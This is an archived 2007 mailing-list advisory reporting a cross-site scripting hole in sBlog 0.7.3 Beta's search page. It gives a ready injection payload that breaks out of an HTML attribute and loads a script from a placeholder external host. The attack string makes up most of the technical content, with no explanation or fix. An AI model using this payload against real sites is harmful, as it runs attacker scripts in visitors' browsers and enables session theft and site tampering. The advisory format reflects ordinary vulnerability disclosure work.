OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
sBlog 0.7.3 Beta XSS Vulnerabilitie

Guns0x90.com.ar
Date: Thu Jul 26 2007 - 18:45:41 CDT


# sBlog 0.7.3 Beta XSS Vulnerabilitie
# Found by 0x90
# www.0x90.com.ar
# msn & mail: Guns0x90.com.ar

# in blog
http://host/blog/search.php

# use

'"/></><script src=http://yoursite.com/evil.js>

# Welcome to the jungle!